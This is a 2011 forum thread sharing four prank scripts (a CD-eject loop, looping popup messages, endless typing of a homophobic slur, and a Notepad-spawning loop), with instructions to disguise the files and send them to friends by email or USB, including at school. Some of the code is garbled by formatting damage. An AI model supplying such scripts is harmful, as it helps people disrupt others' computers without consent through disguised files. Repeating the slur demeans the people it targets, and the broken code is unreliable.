Post: *Notepad* Hacks or Tricks for school or email to friend!
01-26-2011, 01:33 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); These are some tricks that i found and figured could be added on to You must login or register to view this content. but decided to make my own thread.:wtf:

Never ending CD tray poping out
Open notepad and type:
Set oWMP = CreateObject(“WMPlayer.OCX.7?)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop


Save it as (something.vbs) without ()

Repeating Message

Open notepad and type:
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN


Save it as (something.bat) without ()

Type "Im a fag" forever

Open notepad and type:
Set wshShell = wscript.CreateObject(“WScript.Shell”Winky Winky
do
wscript.sleep 100
wshshell.sendkeys “Im a fag”
loop


Save it as (something.bat) without ()

Keep opening notepad

Open notepad and type:
@ECHO off
:top
START %SystemRoot%system32notepad.exe
GOTO top


Save it as (something.bat) without ()

To get a friend with this just name it something they like with the correct extension then attach it to an email and send it, or put it on a usb and take it to there house.

THESE ARE NOT MINE!:banhamma: Credit goes to who found these.
+REP if your going to use these at school or like these...... i will add more when i get some thanks and rep
Last edited by xxxSU44K8xxx ; 01-29-2011 at 02:22 AM.

The following 2 users say thank you to xxxSU44K8xxx for this useful post:

LulzBus, skillz369
01-26-2011, 11:18 AM #2
Okay so once we save the file to somewhere, how would i get it to a friends computer?
Would email be the only way?
01-26-2011, 09:58 PM #3
Lol defitnily gonna try this tomorrow on my school, hope it works xD
01-27-2011, 02:01 AM #4
Originally posted by rishay87 View Post
Okay so once we save the file to somewhere, how would i get it to a friends computer?
Would email be the only way?


Email it as an attachment or put it on a usb and put it on his computer:black:

The following user thanked xxxSU44K8xxx for this useful post:

rishay87
01-27-2011, 03:13 AM #5
Originally posted by xxxSU44K8xxx View Post
Email it as an attachment or put it on a usb and put it on his computer:black:


Thankss Happy
And to end it the person has to restart the computer..?
01-27-2011, 07:33 PM #6
Kombust
At least I can fight
Originally posted by rishay87 View Post
Thankss Happy
And to end it the person has to restart the computer..?


To end them you only have to log off.

Or open task manager and go to processes then look for something like mscript.exe, end it.

The following 2 users say thank you to Kombust for this useful post:

rishay87, xxxSU44K8xxx
01-28-2011, 02:12 AM #7
nice im tryin this out!
02-07-2011, 09:28 PM #8
i will be updateing soon:y:

Copyright © 2024, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo